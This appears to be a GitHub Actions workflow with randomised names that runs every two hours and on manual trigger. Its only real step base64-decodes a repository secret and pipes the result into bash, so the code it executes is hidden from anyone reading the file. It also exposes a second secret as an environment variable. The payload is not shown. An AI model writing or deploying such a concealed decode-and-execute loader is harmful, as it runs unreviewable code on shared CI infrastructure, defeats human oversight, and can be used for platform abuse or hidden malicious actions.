name: NfsDmNJoDJBQ
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  njCwbi:
    runs-on: ubuntu-latest
    env:
      HmDpHZ: ${{ secrets.hwruXdg }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.sYQlAFcPQ }}" | base64 -d | bash
